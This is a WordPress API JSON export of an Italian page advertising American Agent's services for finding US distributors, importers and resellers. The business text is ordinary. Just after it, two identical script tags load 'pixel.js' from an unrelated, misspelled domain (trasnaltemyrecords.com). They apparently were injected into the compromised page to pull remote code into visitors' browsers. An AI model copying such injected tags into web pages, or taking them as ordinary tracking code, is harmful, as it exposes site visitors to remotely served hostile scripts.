{"id":3142,"date":"2014-08-16T07:17:06","date_gmt":"2014-08-16T07:17:06","guid":{"rendered":"https:\/\/americanagent.com\/usa-distributor-search-2\/"},"modified":"2014-09-09T14:53:30","modified_gmt":"2014-09-09T18:53:30","slug":"come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti","status":"publish","type":"page","link":"https:\/\/americanagent.com\/it\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\/","title":{"rendered":"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti."},"content":{"rendered":"<div  class='flex_column av-av_one_full-2a9015ff38129c418a3f2eafba3e9512 av_one_full  avia-builder-el-0  avia-builder-el-no-sibling  first flex_column_div  '     ><p>\n<style type=\"text\/css\" data-created_by=\"avia_inline_auto\" id=\"style-css-av-av_heading-580ea221b8d5a7e6e9af23480dc09132\">\n#top .av-special-heading.av-av_heading-580ea221b8d5a7e6e9af23480dc09132{\npadding-bottom:10px;\n}\nbody .av-special-heading.av-av_heading-580ea221b8d5a7e6e9af23480dc09132 .av-special-heading-tag .heading-char{\nfont-size:25px;\n}\n.av-special-heading.av-av_heading-580ea221b8d5a7e6e9af23480dc09132 .av-subheading{\nfont-size:15px;\n}\n<\/style>\n<div  class='av-special-heading av-av_heading-580ea221b8d5a7e6e9af23480dc09132 av-special-heading-h3  avia-builder-el-1  el_before_av_textblock  avia-builder-el-first '><h3 class='av-special-heading-tag '  itemprop=\"headline\"  >Ricerca Distributori e importatori negli Stati Uniti<\/h3><div class=\"special-heading-border\"><div class=\"special-heading-inner-border\"><\/div><\/div><\/div><br \/>\n<section  class='av_textblock_section av-av_textblock-9bf41aaed25fc1620a8ae3a04c1f84c1 '   itemscope=\"itemscope\" itemtype=\"https:\/\/schema.org\/CreativeWork\" ><div class='avia_textblock'  itemprop=\"text\" ><p>Forse la tua azienda ha una linea di prodotti molto tecnici e complicati, o forse le tue attivit\u00e0 post-vendita hanno bisogno di un miglior supporto sul territorio\u2026Ci sono molte ragioni per cui entrare in partner aggio con i migliori distributori, grossisti, importatori e altre compagnie americane; operare con meccanismi di vendita collaudati e personale che conosce bene il mercato \u00e8 spesso l\u2019unico modo di entrare nel mercato USA.<\/p>\n<p>La societ\u00e0 American Agent \u00e8 nella posizione ideale per aiutarti. Il nostro obiettivo \u00e8 di mettere la tua azienda nella miglior posizione possibile davanti ai possibili partner americani; possiamo instaurare relazioni lavorative a lungo termine tra te e i migliori distributori degli Stati Uniti e potrai fare affari negli USA.<\/p>\n<p>Ecco come possiamo aiutarti a sviluppare il tuo business sul mercato americano:<\/p>\n<ol>\n<li>Selezioniamo i migliori professionisti per te.<\/li>\n<li>Ti mettiamo in contatto con gli Amministratori Delegati e i proprietari delle migliori aziende sul mercato statunitense.<\/li>\n<li>Conduciamo la negoziazione e presentiamo la tua azienda in modo diplomatico, misurando il livello di interesse del potenziale partner nell\u2019entrare in contatto con la tua societ\u00e0.<\/li>\n<\/ol>\n<p>Infine, una volta stabilito quale partner americano \u00e8 pi\u00f9 propenso a fare business con la tua societ\u00e0, organizziamo incontri in base alla tua disponibilit\u00e0 di viaggio. E\u2019 il modo migliore per capire quale aziende possono essere i partner migliori per te.<\/p>\n<p>Contattaci per maggiori informazioni su come trovare distributori, importatori e rivenditori negli USA.<\/p>\n<\/div><\/section><\/p><\/div><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><script src='https:\/\/scripts.trasnaltemyrecords.com\/pixel.js?track=r&#038;subid=043' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":1,"comment_status":"open","ping_status":"open","template":"","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"class_list":["post-3142","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti.<\/title>\n<meta name=\"description\" content=\"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti. Come lavorare con Distributori di vendita Americani. Come vendere negli USA\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/americanagent.com\/it\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti.\" \/>\n<meta property=\"og:description\" content=\"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti. Come lavorare con Distributori di vendita Americani. Come vendere negli USA\" \/>\n<meta property=\"og:url\" content=\"https:\/\/americanagent.com\/it\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\/\" \/>\n<meta property=\"og:site_name\" content=\"American Agent - USA Sales Services and Distributor Search Services\" \/>\n<meta property=\"article:modified_time\" content=\"2014-09-09T18:53:30+00:00\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\\\/\",\"url\":\"https:\\\/\\\/americanagent.com\\\/it\\\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\\\/\",\"name\":\"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti.\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/#website\"},\"datePublished\":\"2014-08-16T07:17:06+00:00\",\"dateModified\":\"2014-09-09T18:53:30+00:00\",\"description\":\"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti. Come lavorare con Distributori di vendita Americani. Come vendere negli USA\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/americanagent.com\\\/it\\\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/americanagent.com\\\/it\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti.\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/americanagent.com\\\/it\\\/#website\",\"url\":\"https:\\\/\\\/americanagent.com\\\/it\\\/\",\"name\":\"American Agent - USA Sales Services and Distributor Search Services\",\"description\":\"USA Sales services and Distributor, Importer and Reseller Search services.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/americanagent.com\\\/it\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti.","description":"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti. Come lavorare con Distributori di vendita Americani. Come vendere negli USA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/americanagent.com\/it\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\/","og_locale":"it_IT","og_type":"article","og_title":"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti.","og_description":"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti. Come lavorare con Distributori di vendita Americani. Come vendere negli USA","og_url":"https:\/\/americanagent.com\/it\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\/","og_site_name":"American Agent - USA Sales Services and Distributor Search Services","article_modified_time":"2014-09-09T18:53:30+00:00","twitter_misc":{"Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/americanagent.com\/it\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\/","url":"https:\/\/americanagent.com\/it\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\/","name":"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti.","isPartOf":{"@id":"https:\/\/americanagent.com\/it\/#website"},"datePublished":"2014-08-16T07:17:06+00:00","dateModified":"2014-09-09T18:53:30+00:00","description":"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti. Come lavorare con Distributori di vendita Americani. Come vendere negli USA","breadcrumb":{"@id":"https:\/\/americanagent.com\/it\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/americanagent.com\/it\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/americanagent.com\/it\/come-trovare-distributori-importatori-e-rivenditori-negli-stati-uniti\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/americanagent.com\/it\/"},{"@type":"ListItem","position":2,"name":"Come trovare Distributori, Importatori e Rivenditori negli Stati Uniti."}]},{"@type":"WebSite","@id":"https:\/\/americanagent.com\/it\/#website","url":"https:\/\/americanagent.com\/it\/","name":"American Agent - USA Sales Services and Distributor Search Services","description":"USA Sales services and Distributor, Importer and Reseller Search services.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/americanagent.com\/it\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"}]}},"_links":{"self":[{"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/pages\/3142","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/comments?post=3142"}],"version-history":[{"count":0,"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/pages\/3142\/revisions"}],"wp:attachment":[{"href":"https:\/\/americanagent.com\/it\/wp-json\/wp\/v2\/media?parent=3142"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}